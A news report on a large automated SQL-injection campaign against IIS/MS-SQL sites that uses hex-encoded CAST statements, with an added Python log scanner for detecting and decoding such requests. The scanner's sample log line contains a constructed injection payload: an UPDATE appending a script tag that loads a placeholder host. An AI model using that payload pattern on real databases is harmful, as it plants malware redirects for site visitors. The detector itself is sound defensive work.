The attack, says SANS, is similar to a smaller SQL-injection attack seen in
November. At least 70,000 sites were compromised in a short period of time,
leading some to speculate this was an automated attack.
From log files,
the attack code appears to exploit a variety of SQL injection vulnerabilities
existing on Web sites using Microsoft SQL or Microsoft IIS. On the vulnerable
sites, malicious JavaScript is injected into all variable character fields and
text fields in the SQL database such that when visitors hit the site, their
browsers, if vulnerable, are then redirected to another domain--in this case,
us8010.com.
Roger Thompson, chief research officer at Grisoft,
identified one of the exploits served at the malicious server as taking
advantage of MS06-014, a Microsoft Data Access Components vulnerability that
Microsoft patched in September 2006. He also noted that "this domain
uc8010(dot)com was registered just a few days ago (Dec 28), and yet, at one
point Google showed script injections pointing to it were showing up on over 70k
domains." Yet by January 5, most of these domains had already been cleaned.
What's interesting about this attack, aside from its automation, is that
the SQL injection script is given in terms of a CAST statement, code that
converts one data type to another. Ryan Barnett has provided a decoded version
of this attack.
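A defender's view of the CAST trick described above, as an added example that is not part of the original article or of Ryan Barnett's decoder: the injected SQL arrives with its real statement hidden inside a hexadecimal literal that CAST(... AS VARCHAR) turns back into text on the database server, so the script tag never appears in the raw request. The detector below pulls the query string out of access-log lines, URL-decodes it, finds hex CAST arguments, decodes them (single-byte for VARCHAR, UTF-16LE for NVARCHAR), and reports whether the recovered SQL writes data or carries a script tag. The log lines, hostnames and the decoded UPDATE statement are constructed placeholders, not the incident's traffic or payload.

```python
import re
from urllib.parse import unquote_plus

# Constructed example only: a placeholder for the kind of UPDATE the article
# describes (appending a script tag to text columns). Not the incident's payload.
SAMPLE_STATEMENT = (
    "UPDATE products SET descr = descr + "
    "'<script src=http://placeholder.invalid/m.js></script>'"
)


def hex_literal(text: str, unicode: bool = False) -> str:
    """Return a T-SQL style 0x... literal for text (UTF-16LE when unicode=True)."""
    raw = text.encode("utf-16-le" if unicode else "latin-1")
    return "0x" + raw.hex().upper()


# Constructed access-log lines (not real traffic). The second line carries a
# hex-encoded CAST(...) in its query string; the third merely contains the word
# "cast" in ordinary search text and must not be flagged.
SAMPLE_LOGS = [
    '10.0.0.5 - - [05/Jan/2008:10:01:12 +0000] "GET /item.asp?id=12 HTTP/1.1" 200 512',
    '10.0.0.9 - - [05/Jan/2008:10:01:13 +0000] "GET /item.asp?id=12;CAST('
    + hex_literal(SAMPLE_STATEMENT)
    + '%20AS%20VARCHAR(4000)) HTTP/1.1" 200 512',
    '10.0.0.7 - - [05/Jan/2008:10:01:14 +0000] "GET /search.asp?q=cast+iron+pan HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')
# CAST(0x... AS VARCHAR) or CAST(0x... AS NVARCHAR); the optional N selects the
# character encoding of the hex bytes.
CAST_HEX_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR", re.IGNORECASE)
SCRIPT_TAG_RE = re.compile(r"<script[\s>]", re.IGNORECASE)
DML_RE = re.compile(r"\b(UPDATE|INSERT|ALTER|EXEC)\b", re.IGNORECASE)


def query_string(log_line: str) -> str:
    """Extract the request target from a log line and URL-decode its query part."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return ""
    return unquote_plus(m.group(1).partition("?")[2])


def decode_cast_payloads(query: str) -> list:
    """Decode every hex CAST argument in the query string back into text."""
    decoded = []
    for m in CAST_HEX_RE.finditer(query):
        hex_digits, is_unicode = m.group(1), bool(m.group(2))
        if len(hex_digits) % 2:  # odd-length literal: left-pad with a zero nibble
            hex_digits = "0" + hex_digits
        raw = bytes.fromhex(hex_digits)
        if is_unicode:
            decoded.append(raw.decode("utf-16-le", errors="replace"))
        else:
            decoded.append(raw.decode("latin-1"))
    return decoded


def classify(log_line: str):
    """Return None for a clean line, else the decoded SQL plus two findings."""
    decoded = decode_cast_payloads(query_string(log_line))
    if not decoded:
        return None
    joined = " ".join(decoded)
    return {
        "decoded": decoded,
        "injects_script": bool(SCRIPT_TAG_RE.search(joined)),
        "modifies_data": bool(DML_RE.search(joined)),
    }


def scan(lines) -> list:
    """Return (line number, result) for every line carrying a hex CAST payload."""
    return [(n, r) for n, line in enumerate(lines, 1) if (r := classify(line))]


if __name__ == "__main__":
    for n, r in scan(SAMPLE_LOGS):
        print(f"line {n}: script={r['injects_script']} dml={r['modifies_data']}")
        for stmt in r["decoded"]:
            print("   ", stmt)
```

Run it against real access logs by replacing SAMPLE_LOGS with the file's lines; anything that decodes to a data-modifying statement or a script tag is worth a closer look, and the decoded text is what you would search the database's varchar and text columns for during cleanup.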
Barnett suggests that to protect against this attack a
Web site should be front-ended by an Apache proxy and then back-ended by IIS or
MS-SQL. SANS says other methods, such as blocking CAST statements, would also be
effective.
Source: www.webhostdir.com